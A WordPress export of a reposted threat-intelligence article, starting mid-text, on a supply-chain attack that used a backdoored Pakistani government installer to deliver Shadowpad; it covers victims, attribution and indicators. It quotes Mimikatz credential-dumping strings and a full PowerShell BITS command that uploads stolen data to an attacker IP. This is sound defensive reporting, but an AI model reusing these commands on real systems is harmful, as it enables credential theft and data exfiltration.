{"id":52763,"date":"2023-07-14T00:00:00","date_gmt":"2023-07-14T00:00:00","guid":{"rendered":"urn:uuid:c617590a-6619-c021-9c83-90b03f4819fa"},"modified":"2023-07-14T00:00:00","modified_gmt":"2023-07-14T00:00:00","slug":"supply-chain-attack-targeting-pakistani-government-delivers-shadowpad","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/","title":{"rendered":"Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/23\/Supply-Chain-Attack-Targeting-Pakistani-Government-Delivers-Shadowpad-976.png\"><\/p>\n<div><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/23\/Supply-Chain-Attack-Targeting-Pakistani-Government-Delivers-Shadowpad-976.png\" class=\"ff-og-image-inserted\"><\/div>\n<p>We did not search further, as the URL is self-explanatory. It is likely that the legitimate E-Office application connects to this IP address and port to search for updates. It also seems very unlikely that every Pakistani government organization that deploys E-Office has the same network mapping. However, we do not know if the address of the update server can be configured or if it was unintentionally left as a debug feature from the developers.<\/p>\n<p>In all cases, it was clever for the attackers to use an IP address that is hard-coded in a legitimate application used by their targets.<\/p>\n<p>On the defender\u2019s side, we recommend searching for POST requests to the IP address 10.2.101.110 on port 50000, as the legitimate application seems to send GET requests. It is also noticeable that in the case of a malicious installer, the connection happens right after launching the installation process, while in the case of a clean installer, the connection is only triggered after running the E-Office application.<\/p>\n<p><b><span class=\"body-subhead-title\">Targets<\/span><\/b><\/p>\n<p>We found three targets within our telemetry, all located in Pakistan; two are from the government\/public sector and are oriented toward finance, while one is from a telecommunications provider.<\/p>\n<p>The first victim we found was a Pakistan government entity, and we could confirm that the Shadowpad sample landed on the victim after executing the backdoored E-Office installer analyzed in a previous section. The infection took place on September 28, 2022.<\/p>\n<p>The second victim was a Pakistani public sector bank. In this incident, different Shadowpad samples were detected on September 30, 2022 after E-Office was installed. We could not retrieve the related E-Office installer.<\/p>\n<p>Other related Shadowpad samples were detected at a Pakistani telecommunications provider in May 2022. Later analysis showed that one of them had been there since mid-February 2022. We were unable to find the infection vector for this incident.<\/p>\n<p><b><span class=\"body-subhead-title\">Post-exploitation and data exfiltration<\/span><\/b><\/p>\n<p>Within our telemetry, we noticed that the attacker used a portable Mimikatz variant the day following the appearance of a Shadowpad sample. Although we could not confirm it because we did not have access to the file, we found traces of strings <i>privilege::debug<\/i> followed by<i>:sekurlsa::logonpasswords<\/i>, which looks like the Mimikatz <a href=\"https:\/\/tools.thehacker.recipes\/mimikatz\/modules\/sekurlsa\/logonpasswords\">sekurlsa<\/a> plug-in that dumps LSASS secrets.<\/p>\n<p>Four days after that, we found traces of data exfiltration. The threat actor used a very simple PowerShell command that relies on Background Intelligent Transfer Service (BITS).<\/p>\n<p><span class=\"blockquote\">powershell &nbsp;-nop -exec bypass &#8220;&#8221;import-module bitstransfer;start-bitstransfer -source c:\\windows\\help\\1019.rar -destination http:\/\/158.247.230.255\/1019.rar -transfertype upload\u201d\u201d<\/span><\/p>\n<p>We could not retrieve the exfiltrated file. However, by looking at OSINT sources, we learned that the threat actor likely had control over that IP address from late April 2022 to late October 2022.<\/p>\n<p><b><span class=\"body-subhead-title\">Attribution<\/span><\/b><\/p>\n<p>We did not find enough evidence to attribute this attack to a known threat actor.<\/p>\n<p>As mentioned earlier, since Shadowpad is a shared malware family, we cannot rely on it to attribute the attack to a particular threat actor.<\/p>\n<p>Of two out of three victims of this campaign, we could not find any further malware samples or tactics, techniques, and procedures (TTPs) that could be helpful for the attribution of the campaign. In the third victim\u2019s environment, however, we found multiple malware families that we analyzed in our search for links to known threat actors.<\/p>\n<p>Notably, we found one dropper described by <a href=\"https:\/\/www.ptsecurity.com\/ww-en\/analytics\/calypso-apt-2019\/#id6\" target=\"_blank\" rel=\"noopener\">PTSecurity<\/a> and by <a href=\"https:\/\/st.drweb.com\/static\/new-www\/news\/2020\/july\/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf\" target=\"_blank\" rel=\"noopener\">Dr. Web<\/a> (under the name \u201cTrojan.Misisc.1\u201d) that we could attribute with high confidence to the Calypso threat actor. The payload was a simple keylogger.<\/p>\n<p>Another malware sample that we found turned out to be what PTSecurity describes as <a href=\"https:\/\/www.ptsecurity.com\/ww-en\/analytics\/pt-esc-threat-intelligence\/space-pirates-tools-and-connections\/#id3-7\" target=\"_blank\" rel=\"noopener\">Deed RAT<\/a> in the report on the Space Pirates threat actor. Our analysis shows that rather than a new malware family, it is likely that this is a Shadowpad variant obfuscated differently and using a different encryption scheme. We claim with low confidence that this piece of malware also belongs to the Calypso threat actor toolkit.<\/p>\n<p>The last malware family that we found belongs to the <a href=\"https:\/\/www.volexity.com\/blog\/2022\/06\/15\/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach\/\" target=\"_blank\" rel=\"noopener\">DriftingCloud<\/a> threat actor. As far as we know, DriftingCloud is not known to use Windows malware. Additionally, we found the same sample targeting a totally different location and industry, enforcing our opinion that this sample is probably unrelated to the threat actor.<\/p>\n<p>Unfortunately, we could not find any clear links between these pieces of malware and the Shadowpad samples related to our threat actor. Therefore, we prefer to refrain from making any uncertain attribution claim.<\/p>\n<p><b>Bronze University Shadowpad sample<\/b><\/p>\n<p>In February 2022, Dell SecureWorks wrote a <a href=\"https:\/\/www.secureworks.com\/research\/shadowpad-malware-analysis\" target=\"_blank\" rel=\"noopener\">report<\/a> on Shadowpad, in which multiple threat actors are described as using this malware family. In the list of indicators of compromise (IOC), we noticed that the payload <i>253f474aa0147fdcf88beaae40f3a23bdadfc98b8dd36ae2d81c387ced2db4f1<\/i> uses the new encryption scheme that we described previously, with a base encryption key that we attribute to our threat actor. The related C&amp;C domain names are live[.]musicweb[.]xyz and obo[.]videocenter[.]org. Kaspersky <a href=\"https:\/\/ics-cert.kaspersky.com\/publications\/reports\/2022\/06\/27\/attacks-on-industrial-control-systems-using-shadowpad\/\" target=\"_blank\" rel=\"noopener\">lists<\/a> those domain names in a report mentioning targets in the industrial and telecommunications sectors in both Pakistan and Afghanistan, but do not include strong attribution links.<\/p>\n<p>Dell SecureWorks attributes this sample to Bronze University, which matches the threat actor we call <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/22\/a\/earth-lusca-sophisticated-infrastructure-varied-tools-and-techni.html\">Earth Lusca<\/a>.<\/p>\n<p>However, we question this attribution. All the other Shadowpad samples attributed to Bronze University in the IOC list are named <i>log.dll.dat<\/i>, while our payload is named <i>iviewers.dll.dat<\/i>. Moreover, none of those samples uses the new encryption scheme that we described previously. In fact, they use the old encryption scheme <a href=\"https:\/\/www.pwc.co.uk\/issues\/cyber-security-services\/research\/chasing-shadows.html\" target=\"_blank\" rel=\"noopener\">described<\/a> by PwC, using the <i>0x107e666d <\/i>constant. Finally, the C&amp;C domain names of the <i>253f474aa0147fdcf88beaae40f3a23bdadfc98b8dd36ae2d81c387ced2db4f1 <\/i>payload do not match the usual Earth Lusca registration pattern that we know of.<\/p>\n<p>Thus, we prefer to refrain from attributing this whole attack to Earth Lusca. However, we will be happy to correct our assessment in the future if we have further proof of the links between this campaign and Earth Lusca.<\/p>\n<p><b><span class=\"body-subhead-title\">Conclusion<\/span><\/b><\/p>\n<p>From what we have seen so far, this whole campaign was the result of a very capable threat actor that managed to retrieve and modify the installer of a governmental application to compromise at least three sensitive targets.<\/p>\n<p>The fact that the threat actor has access to a recent version of Shadowpad potentially links it to the nexus of Chinese threat actors, although we cannot point to a particular group with confidence. However, we managed to show how the Shadowpad authors continue to update their piece of malware, making its reverse engineering more difficult. Finally, we detailed how this threat actor carefully chose one of its C&amp;C addresses to blend in with the legitimate network traffic, which shows great preparation capability.<\/p>\n<p>We expect to see more threat actors using this updated Shadowpad version in the future.<\/p>\n<p> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/23\/g\/supply-chain-attack-targeting-pakistani-government-delivers-shad.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>We recently found that an MSI installer built by the National Information Technology Board (NITB), a Pakistani government entity, delivered a Shadowpad sample, suggesting a possible supply-chain attack. Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":52764,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9508,9513,9509],"class_list":["post-52763","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-endpoints","tag-trend-micro-research-malware","tag-trend-micro-research-research"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2023-07-14T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/23\/Supply-Chain-Attack-Targeting-Pakistani-Government-Delivers-Shadowpad-976.png\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad\",\"datePublished\":\"2023-07-14T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\\\/\"},\"wordCount\":1151,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/07\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad.png\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Endpoints\",\"Trend Micro Research : Malware\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\\\/\",\"name\":\"Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/07\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad.png\",\"datePublished\":\"2023-07-14T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/07\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad.png\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/07\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad.png\",\"width\":976,\"height\":533},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/","og_locale":"en_US","og_type":"article","og_title":"Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2023-07-14T00:00:00+00:00","og_image":[{"url":"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/23\/Supply-Chain-Attack-Targeting-Pakistani-Government-Delivers-Shadowpad-976.png","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad","datePublished":"2023-07-14T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/"},"wordCount":1151,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/07\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad.png","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Endpoints","Trend Micro Research : Malware","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/","url":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/","name":"Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/07\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad.png","datePublished":"2023-07-14T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/07\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad.png","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/07\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad.png","width":976,"height":533},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/supply-chain-attack-targeting-pakistani-government-delivers-shadowpad\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/52763","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=52763"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/52763\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/52764"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=52763"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=52763"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=52763"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}